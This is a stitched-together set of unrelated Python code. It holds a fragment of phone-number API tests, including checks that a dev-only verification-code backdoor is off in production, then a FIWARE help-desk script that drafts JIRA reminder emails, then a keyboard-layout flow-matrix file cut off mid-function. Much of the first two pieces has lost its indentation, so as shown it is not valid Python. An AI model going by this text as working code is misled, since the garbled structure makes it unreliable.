response1 = self._post_phone(mod_data=data)
self.assertEqual(response1.status_code, 200)
new_phone_data = json.loads(response1.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual('+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
eppn = self.test_user_data['eduPersonPrincipalName']
# Save above phone number for user in central db
user = self.app.private_userdb.get_user_by_eppn(eppn)
self.request_user_sync(user)
        data = {'number': '+46701234565'} # e164 format
response2 = self._post_phone(mod_data=data)
self.assertEqual(response2.status_code, 200)
new_phone_data2 = json.loads(response2.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data2['type'])
self.assertEqual(['phone.phone_duplicated'], new_phone_data2['payload']['error'].get('number'))
def test_get_code_backdoor(self):
self.app.conf.magic_cookie = 'magic-cookie'
self.app.conf.magic_cookie_name = 'magic'
self.app.conf.environment = 'dev'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, code.encode('ascii'))
def test_get_code_no_backdoor_in_pro(self):
self.app.conf.magic_cookie = 'magic-cookie'
self.app.conf.magic_cookie_name = 'magic'
self.app.conf.environment = 'pro'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 400)
def test_get_code_no_backdoor_misconfigured1(self):
self.app.conf.magic_cookie = 'magic-cookie'
self.app.conf.magic_cookie_name = ''
self.app.conf.environment = 'dev'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 400)
def test_get_code_no_backdoor_misconfigured2(self):
self.app.conf.magic_cookie = ''
self.app.conf.magic_cookie_name = 'magic'
self.app.conf.environment = 'dev'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 400)
# DesksReminder/Desks/help_desk.py
# Source repo: flopezag/fiware-management-scripts (Apache-2.0)
from datetime import date, datetime
from DesksReminder.Basics.dataFinder import Data
from DesksReminder.Basics.nickNames import ContactBook
from Config.settings import JIRA_URL
__author__ = 'Manuel Escriche'
class TechHelpDesk:
def __init__(self):
self.contactBook = ContactBook()
def open(self):
messages = list()
for issue in Data().getTechHelpDeskOpen():
created = datetime.strptime(issue.fields.created[:10], '%Y-%m-%d').date()
unanswered = (date.today() - created).days
if unanswered <= 1:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
# status = issue.fields.status.name
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Tech Channel : Open Issue'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is still OPEN, i.e. not replied for {} days.".format(issue, unanswered) +\
"\nLet me remind you of our rule to reply in the first 24 hours during working days." +\
"\nI would appreciate you spent a minute to reply to this request and to evolve its status." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def inProgress(self):
messages = list()
for issue in Data().getTechHelpDeskInProgress():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 7:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Tech Channel : stalled Issue?'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is In Progress but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to update it by reporting its progress in a comment" \
"\nor if there were a blocking condition, please, report it in a comment and evolve " \
"its status to Impeded." +\
"\nor if it was answered, please, evolve its status." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def answered(self):
messages = list()
for issue in Data().getTechHelpDeskAnswered():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 4:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Tech Channel : Closed Issue?'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} has been Answered but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to close it" \
"\nor if the exchange continues, please, update its progress in a comment" \
"\nor if there were a blocking condition, please, report it in a comment " \
"and evolve its status to Impeded." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def impeded(self):
messages = list()
for issue in Data().getTechHelpDeskImpeded():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 7:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Tech Channel : Impeded Issue?'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is Impeded but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to check its blocking condition persist:" \
"\nif so, please, add a comment stating it" \
"\nif not, please, get it back to In Progress, and address it" +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
class LabHelpDesk:
def __init__(self):
self.contactBook = ContactBook()
def open(self):
messages = list()
for issue in Data().getLabHelpDeskOpen():
created = datetime.strptime(issue.fields.created[:10], '%Y-%m-%d').date()
unanswered = (date.today() - created).days
if unanswered <= 1:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Lab Channel : Open Issue'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is still OPEN, i.e. not replied for {} days.".format(issue, unanswered) +\
"\nLet me remind you of our rule to reply in the first 24 hours during working days." +\
"\nI would appreciate you spent a minute to reply to this request and to evolve its status." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
def inProgress(self):
messages = list()
for issue in Data().getLabHelpDeskInProgress():
updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
noupdated = (date.today() - updated).days
if noupdated < 7:
continue
summary = issue.fields.summary
display_name = issue.fields.assignee.displayName.strip()
nickname = self.contactBook.getNickName(display_name)
email_address = issue.fields.assignee.emailAddress
url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
subject = 'FIWARE: Help Desk - Lab Channel : stalled Issue?'
message = 'Dear {},'.format(nickname) +\
"\n\nI noticed issue {} is In Progress but no update happened in the last {} days."\
.format(issue, noupdated) +\
"\nI would appreciate you spent a minute to update it by reporting its progress in a comment" \
"\nor if there were a blocking condition, please, report it in a comment " \
"and evolve its status to Impeded." +\
"\nor if it was answered, please, progress its status." +\
"\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
"\nYou can access it at {}".format(url) +\
'\n\nThanks in advance for cooperation!!' +\
'\n\nKind Regards,' +\
'\nFernando'
messages.append(dict(issue=issue,
summary=summary.encode('utf-8'),
email=email_address,
nickname=nickname,
displayname=display_name,
subject=subject,
body=message))
return messages
    def answered(self):
        messages = list()
        for issue in Data().getLabHelpDeskAnswered():
            updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
            noupdated = (date.today() - updated).days
            if noupdated < 4:
                continue
            summary = issue.fields.summary
            display_name = issue.fields.assignee.displayName.strip()
            nickname = self.contactBook.getNickName(display_name)
            email_address = issue.fields.assignee.emailAddress
            # status = issue.fields.status.name
            url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
            subject = 'FIWARE: Help Desk - Lab Channel : Closed Issue?'
            message = 'Dear {},'.format(nickname) +\
                      "\n\nI noticed issue {} has been Answered but no update happened in the last {} days."\
                      .format(issue, noupdated) +\
                      "\nI would appreciate you spent a minute to close it" \
                      "\nor if the exchange continues, please, update its progress in a comment" \
                      "\nor if there were a blocking condition, please, report it in a comment " \
                      "and evolve its status to Impeded." +\
                      "\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
                      "\nYou can access it at {}".format(url) +\
                      '\n\nThanks in advance for cooperation!!' +\
                      '\n\nKind Regards,' +\
                      '\nFernando'
            messages.append(dict(issue=issue,
                                 summary=summary.encode('utf-8'),
                                 email=email_address,
                                 nickname=nickname,
                                 displayname=display_name,
                                 subject=subject,
                                 body=message))
        return messages
    def impeded(self):
        messages = list()
        for issue in Data().getLabHelpDeskImpeded():
            updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
            noupdated = (date.today() - updated).days
            if noupdated < 7:
                continue
            summary = issue.fields.summary
            display_name = issue.fields.assignee.displayName.strip()
            nickname = self.contactBook.getNickName(display_name)
            email_address = issue.fields.assignee.emailAddress
            url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
            subject = 'FIWARE: Help Desk - Lab Channel : Impeded Issue?'
            message = 'Dear {},'.format(nickname) +\
                      "\n\nI noticed issue {} is Impeded but no update happened in the last {} days."\
                      .format(issue, noupdated) +\
                      "\nI would appreciate you spent a minute to check its blocking condition persist:" \
                      "\nif so, please, add a comment stating it" \
                      "\nif not, please, get it back to In Progress, and address it" +\
                      "\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
                      "\nYou can access it at {}".format(url) +\
                      '\n\nThanks in advance for cooperation!!' +\
                      '\n\nKind Regards,' +\
                      '\nFernando'
            messages.append(dict(issue=issue,
                                 summary=summary.encode('utf-8'),
                                 email=email_address,
                                 nickname=nickname,
                                 displayname=display_name,
                                 subject=subject,
                                 body=message))
        return messages
class OthersHelpDesk:
    def __init__(self):
        self.contactBook = ContactBook()
        self.channels = {'FIWARE-COLLABORATION-REQ': 'Collaboration',
                         'FIWARE-FEEDBACK': 'Feedback',
                         'FIWARE-GENERAL-HELP': 'General',
                         'FIWARE-MUNDUS-REQ': 'Mundus',
                         'FIWARE-OPEN-DATA-REQ': 'OpenData',
                         'FIWARE-OPS-HELP': 'Operations',
                         'FIWARE-SMART-CITIES-REQ': 'SmartCities',
                         'FIWARE-SPEAKERS-REQ': 'Speakers',
                         'FIWARE-TRAINING-REQ': 'Training'}

    def open(self):
        messages = list()
        for issue in Data().getOthersHelpDeskOpen():
            created = datetime.strptime(issue.fields.created[:10], '%Y-%m-%d').date()
            unanswered = (date.today() - created).days
            if unanswered <= 1:
                continue
            summary = issue.fields.summary
            display_name = issue.fields.assignee.displayName.strip()
            nickname = self.contactBook.getNickName(display_name)
            email_address = issue.fields.assignee.emailAddress
            channel = self.channels[issue.fields.components[0].name]
            # status = issue.fields.status.name
            url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
            subject = 'FIWARE: Help Desk - {} Channel : Open Issue'.format(channel)
            message = 'Dear {},'.format(nickname) +\
                      "\n\nI noticed issue {} is still OPEN, i.e. not replied for {} days.".format(issue, unanswered) +\
                      "\nLet me remind you of our rule to reply in the first 24 hours during working days." +\
                      "\nI would appreciate you spent a minute to reply to this request and to evolve its status." +\
                      "\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
                      "\nYou can access it at {}".format(url) +\
                      '\n\nThanks in advance for cooperation!!' +\
                      '\n\nKind Regards,' +\
                      '\nFernando'
            messages.append(dict(issue=issue,
                                 summary=summary.encode('utf-8'),
                                 email=email_address,
                                 nickname=nickname,
                                 displayname=display_name,
                                 subject=subject,
                                 body=message))
        return messages
    def inProgress(self):
        messages = list()
        for issue in Data().getOthersHelpDeskInProgress():
            updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
            noupdated = (date.today() - updated).days
            if noupdated < 7:
                continue
            summary = issue.fields.summary
            display_name = issue.fields.assignee.displayName.strip()
            nickname = self.contactBook.getNickName(display_name)
            email_address = issue.fields.assignee.emailAddress
            channel = self.channels[issue.fields.components[0].name]
            url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
            subject = 'FIWARE: Help Desk - {} Channel : stalled Issue?'.format(channel)
            message = 'Dear {},'.format(nickname) +\
                      "\n\nI noticed issue {} is In Progress but no update happened in the last {} days."\
                      .format(issue, noupdated) +\
                      "\nI would appreciate you spent a minute to update it by reporting its progress in a comment" \
                      "\nor if there were a blocking condition, please, report it in a comment and " \
                      "evolve its status to Impeded." +\
                      "\nor if it was answered, please, evolve its status." +\
                      "\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
                      "\nYou can access it at {}".format(url) +\
                      '\n\nThanks in advance for cooperation!!' +\
                      '\n\nKind Regards,' +\
                      '\nFernando'
            messages.append(dict(issue=issue,
                                 summary=summary.encode('utf-8'),
                                 email=email_address,
                                 nickname=nickname,
                                 displayname=display_name,
                                 subject=subject,
                                 body=message))
        return messages
    def answered(self):
        messages = list()
        for issue in Data().getOthersHelpDeskAnswered():
            updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
            noupdated = (date.today() - updated).days
            if noupdated < 4:
                continue
            summary = issue.fields.summary
            display_name = issue.fields.assignee.displayName.strip()
            nickname = self.contactBook.getNickName(display_name)
            email_address = issue.fields.assignee.emailAddress
            channel = self.channels[issue.fields.components[0].name]
            url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
            subject = 'FIWARE: Help Desk - {} Channel : Closed Issue?'.format(channel)
            message = 'Dear {},'.format(nickname) +\
                      "\n\nI noticed issue {} has been Answered but no update happened in the last {} days."\
                      .format(issue, noupdated) +\
                      "\nI would appreciate you spent a minute to close it" \
                      "\nor if the exchange continues, please, update its progress in a comment" \
                      "\nor if there were a blocking condition, please, report it in a comment " \
                      "and evolve its status to Impeded." +\
                      "\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
                      "\nYou can access it at {}".format(url) +\
                      '\n\nThanks in advance for cooperation!!' +\
                      '\n\nKind Regards,' +\
                      '\nFernando'
            messages.append(dict(issue=issue,
                                 summary=summary.encode('utf-8'),
                                 email=email_address,
                                 nickname=nickname,
                                 displayname=display_name,
                                 subject=subject,
                                 body=message))
        return messages
    def impeded(self):
        messages = list()
        for issue in Data().getOthersHelpDeskImpeded():
            updated = datetime.strptime(issue.fields.updated[:10], '%Y-%m-%d').date()
            noupdated = (date.today() - updated).days
            if noupdated < 7:
                continue
            summary = issue.fields.summary
            display_name = issue.fields.assignee.displayName.strip()
            nickname = self.contactBook.getNickName(display_name)
            email_address = issue.fields.assignee.emailAddress
            channel = self.channels[issue.fields.components[0].name]
            url = 'http://{}/browse/{}'.format(JIRA_URL, issue)
            subject = 'FIWARE: Help Desk - {} Channel : Impeded Issue?'.format(channel)
            message = 'Dear {},'.format(nickname) +\
                      "\n\nI noticed issue {} is Impeded but no update happened in the last {} days."\
                      .format(issue, noupdated) +\
                      "\nI would appreciate you spent a minute to check its blocking condition persist:" \
                      "\nif so, please, add a comment stating it" \
                      "\nif not, please, get it back to In Progress, and address it" +\
                      "\n\nIssue Summary: {}".format(summary.encode('utf-8')) +\
                      "\nYou can access it at {}".format(url) +\
                      '\n\nThanks in advance for cooperation!!' +\
                      '\n\nKind Regards,' +\
                      '\nFernando'
            messages.append(dict(issue=issue,
                                 summary=summary.encode('utf-8'),
                                 email=email_address,
                                 nickname=nickname,
                                 displayname=display_name,
                                 subject=subject,
                                 body=message))
        return messages

if __name__ == "__main__":
    pass
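All of the reminder methods above share one staleness test: parse the leading `YYYY-MM-DD` of a JIRA timestamp and compare it with today. A minimal standalone sketch of that computation (not part of the original script; the function name and sample timestamp are illustrative):

```python
from datetime import date, datetime

def days_without_update(jira_timestamp, today=None):
    """Days elapsed since a JIRA ISO timestamp such as
    '2021-03-01T12:34:56.000+0000'. Only the leading YYYY-MM-DD is
    parsed, mirroring the issue.fields.updated[:10] slicing above."""
    today = today or date.today()
    updated = datetime.strptime(jira_timestamp[:10], '%Y-%m-%d').date()
    return (today - updated).days

# An issue last touched on March 1st is 9 days stale on March 10th:
print(days_without_update('2021-03-01T12:34:56.000+0000', today=date(2021, 3, 10)))  # 9
```

Each channel then applies its own threshold to this value: 7 days for In Progress and Impeded issues, 4 days for Answered ones, and 1 working day for Open issues.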
# File: code/load_flow_matrices.py (repo: Apsu/engram, MIT license)

# Penalizing factors for 24 keys (1 = no penalty; set to less than 1 to penalize):
# Dexterity
side_above_3away = 0.9 # index and little finger type two keys, one or more rows apart (same hand)
side_above_2away = 0.81 # index finger types key a row or two above ring finger key, or
# little finger types key a row or two above middle finger key (same hand)
side_above_1away = 0.729 # index finger types key a row or two above middle finger key, or
# little finger types key a row or two above ring finger key (same hand)
middle_above_ring = 0.9 # middle finger types key a row or two above ring finger key (same hand)
ring_above_middle = 0.729 # ring finger types key a row or two above middle finger key (same hand)
lateral = 0.9 # lateral movement of (index or little) finger outside of 8 vertical columns
# Direction
outward = 0.9 # outward roll of fingers from the index to little finger (same hand)
# Distance
skip_row_3away = 0.9 # index and little fingers type two keys that skip over home row (same hand)
# (e.g., one on bottom row, the other on top row)
skip_row_2away = 0.729 # little and middle or index and ring fingers type two keys that skip over home row (same hand)
skip_row_1away = 0.59049 # little and ring or middle and index fingers type two keys that skip over home row (same hand)
# Repetition
skip_row_0away = 0.6561 # same finger types two keys that skip over home row
same_finger = 0.59049 # use same finger again for a different key
# Unused or redundant parameters
same_hand = 1.0 # (addressed by splitting up the most frequent letters across left/right sides above)
not_home_row = 1.0 # at least one key not on home row
side_top = 1.0 # index or little finger types top corner key
shorter_above = 1.0 # (taken care of by side_above_[1,2,3]away parameters)
adjacent_offset = 1.0 # (taken care of by side_above_1away, middle_above_ring, ring_above_middle parameters)
inside_top = 1.0 # index finger types top corner key (taken care of by side_above_1away parameter)
index_above = 1.0 # index finger types top corner key (unless other bigram key is in the top row for the same hand)
# (taken care of by side_above_[1,2,3]away parameters)
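The non-trivial constants above are successive powers of a single damping factor 0.9, so each extra "degree of awkwardness" compounds the penalty multiplicatively. A quick standalone check of that relationship (the dictionary below just restates the constants already defined above):

```python
import math

base = 0.9
# Exponent -> constant used above (e.g. 0.9**3 backs side_above_1away,
# ring_above_middle and skip_row_2away; 0.9**5 backs same_finger).
powers = {1: 0.9, 2: 0.81, 3: 0.729, 4: 0.6561, 5: 0.59049}
for exponent, constant in powers.items():
    assert math.isclose(base ** exponent, constant)
    print('0.9**{} = {}'.format(exponent, round(base ** exponent, 5)))
```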
def create_24x24_flow_matrix(not_home_row, side_top, side_above_3away, side_above_2away, side_above_1away,
                             middle_above_ring, ring_above_middle, outward, skip_row_3away,
                             skip_row_2away, skip_row_1away, skip_row_0away, same_finger, lateral,
                             same_hand, shorter_above, adjacent_offset, inside_top, index_above):
    all_24_keys = [1,2,3,4, 5,6,7,8, 9,10,11,12, 13,14,15,16, 17,18,19,20, 21,22,23,24]

    # Create a matrix and multiply by flow factors that promote easy interkey transitions:
    T = np.ones((24, 24))

    # 7. Promote alternating between hands over uncomfortable transitions with the same hand.
    if same_hand < 1.0:
        # 1  2  3  4     13 14 15 16
        # 5  6  7  8     17 18 19 20
        # 9 10 11 12     21 22 23 24
        for i in range(0,12):
            for j in range(0,12):
                T[i,j] *= same_hand
        for i in range(12,24):
            for j in range(12,24):
                T[i,j] *= same_hand

    # 8. Promote little-to-index-finger roll-ins over index-to-little-finger outwards.
    # 1  2  3  4     13 14 15 16
    # 5  6  7  8     17 18 19 20
    # 9 10 11 12     21 22 23 24
    if outward < 1.0:
        # same-row roll-outs:
        roll_ins = [[1,2],[2,3],[3,4], [5,6],[6,7],[7,8], [9,10],[10,11],[11,12],
                    [16,15],[15,14],[14,13], [20,19],[19,18],[18,17], [24,23],[23,22],[22,21]]
        for x in roll_ins:
            T[x[1]-1, x[0]-1] *= outward
        # same-row roll-outs, skipping keys:
        roll_ins_skip_keys = [[1,3],[2,4],[1,4], [5,7],[6,8],[5,8], [9,11],[10,12],[9,12],
                              [16,14],[15,13],[16,13], [20,18],[19,17],[20,17], [24,22],[23,21],[24,21]]
        for x in roll_ins_skip_keys:
            T[x[1]-1, x[0]-1] *= outward
        # adjacent-row roll-outs:
        roll_ins_adj_rows = [[1,6],[1,7],[1,8],[2,7],[2,8],[3,8], [5,2],[5,3],[5,4],[6,3],[6,4],[7,4],
                             [5,10],[5,11],[5,12],[6,11],[6,12],[7,12], [9,6],[9,7],[9,8],[10,7],[10,8],[11,8],
                             [16,19],[16,18],[16,17],[15,18],[15,17],[14,17], [20,15],[20,14],[20,13],[19,14],[19,13],[18,13],
                             [20,23],[20,22],[20,21],[19,22],[19,21],[18,21], [24,19],[24,18],[24,17],[23,18],[23,17],[22,17]]
        for x in roll_ins_adj_rows:
            T[x[1]-1, x[0]-1] *= outward
        # upper<->lower row roll-outs:
        roll_ins_skip_home = [[1,10],[1,11],[1,12],[2,11],[2,12],[3,12], [9,2],[9,3],[9,4],[10,3],[10,4],[11,4],
                              [16,23],[16,22],[16,21],[15,22],[15,21],[14,21], [24,15],[24,14],[24,13],[23,14],[23,13],[22,13]]
        for x in roll_ins_skip_home:
            T[x[1]-1, x[0]-1] *= outward

    # 9. Avoid stretching shorter fingers up and longer fingers down.
    # 1  2  3  4     13 14 15 16
    # 5  6  7  8     17 18 19 20
    # 9 10 11 12     21 22 23 24
    if index_above < 1.0:
        for x in [4]:
            for y in [4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]:
                T[x-1, y-1] *= index_above
                T[y-1, x-1] *= index_above
        for x in [13]:
            for y in [1,2,3,4,5,6,7,8,9,10,11,12,13,17,18,19,20,21,22,23,24]:
                T[x-1, y-1] *= index_above
                T[y-1, x-1] *= index_above
    if inside_top < 1.0:
        for x in [4,13]:
            for j in range(0,24):
                T[x-1, j] *= inside_top
                T[j, x-1] *= inside_top
    if side_top < 1.0:
        for x in [1,4,13,16]:
            for j in range(0,24):
                T[x-1, j] *= side_top
                T[j, x-1] *= side_top
    if side_above_1away < 1.0:
        for x in [1]:
            for y in [6,10]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [5]:
            for y in [10]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [4]:
            for y in [7,11]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [8]:
            for y in [11]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [13]:
            for y in [18,22]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [17]:
            for y in [22]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [16]:
            for y in [19,23]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [20]:
            for y in [23]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
    if side_above_2away < 1.0:
        for x in [1]:
            for y in [7,11]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [5]:
            for y in [11]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [4]:
            for y in [6,10]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [8]:
            for y in [10]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [13]:
            for y in [19,23]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [17]:
            for y in [23]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [16]:
            for y in [18,22]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [20]:
            for y in [22]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
    if side_above_3away < 1.0:
        for x in [1]:
            for y in [8,12]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [5]:
            for y in [12]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [4]:
            for y in [5,9]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [8]:
            for y in [9]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [13]:
            for y in [20,24]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [17]:
            for y in [24]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [16]:
            for y in [17,21]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [20]:
            for y in [21]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
    if shorter_above < 1.0:
        for x in [1]:
            for y in [6,7,8,10,11,12]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [2]:
            for y in [7,11]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [4]:
            for y in [6,7,10,11]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [5]:
            for y in [10,11,12]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [6]:
            for y in [11]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [8]:
            for y in [10,11]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [16]:
            for y in [17,18,19,21,22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [15]:
            for y in [18,22]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [13]:
            for y in [18,19,22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [20]:
            for y in [21,22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [19]:
            for y in [22]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [17]:
            for y in [22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
    if ring_above_middle < 1.0:
        ring_above_middles = [[2,7],[6,11],[2,11],
                              [15,18],[19,22],[15,22]]
        for x in ring_above_middles:
            T[x[0]-1, x[1]-1] *= ring_above_middle
            T[x[1]-1, x[0]-1] *= ring_above_middle
    if middle_above_ring < 1.0:
        middle_above_rings = [[6,3],[10,7],[10,3],
                              [19,14],[23,18],[23,14]]
        for x in middle_above_rings:
            T[x[0]-1, x[1]-1] *= middle_above_ring
            T[x[1]-1, x[0]-1] *= middle_above_ring

    # 10. Avoid using the same finger.
    # 1  2  3  4     13 14 15 16
    # 5  6  7  8     17 18 19 20
    # 9 10 11 12     21 22 23 24
    if same_finger < 1.0:
        same_fingers = [[1,5],[5,9],[1,9], [2,6],[6,10],[2,10], [3,7],[7,11],[3,11], [4,8],[8,12],[4,12],
                        [13,17],[17,21],[13,21], [14,18],[18,22],[14,22], [15,19],[19,23],[15,23], [16,20],[20,24],[16,24]]
        for x in same_fingers:
            T[x[0]-1, x[1]-1] *= same_finger
            T[x[1]-1, x[0]-1] *= same_finger

    # 11. Avoid the upper and lower rows.
    # 1  2  3  4     13 14 15 16
    # 5  6  7  8     17 18 19 20
    # 9 10 11 12     21 22 23 24
    if not_home_row < 1.0:
        not_home_row_keys = [1,2,3,4, 9,10,11,12, 13,14,15,16, 21,22,23,24]
        for x in not_home_row_keys:
            for j in range(0,24):  # was range(0,23), which skipped the last column
                T[x-1, j] *= not_home_row
                T[j, x-1] *= not_home_row

    # 12. Avoid skipping over the home row.
    # 1  2  3  4     13 14 15 16
    # 5  6  7  8     17 18 19 20
    # 9 10 11 12     21 22 23 24
    if skip_row_0away < 1.0:
        skip_top = [1, 2, 3, 4, 13,14,15,16]
        skip_bot = [9,10,11,12, 21,22,23,24]
        for ix, x in enumerate(skip_top):
            y = skip_bot[ix]
            T[x-1, y-1] *= skip_row_0away
            T[y-1, x-1] *= skip_row_0away
    if skip_row_1away < 1.0:
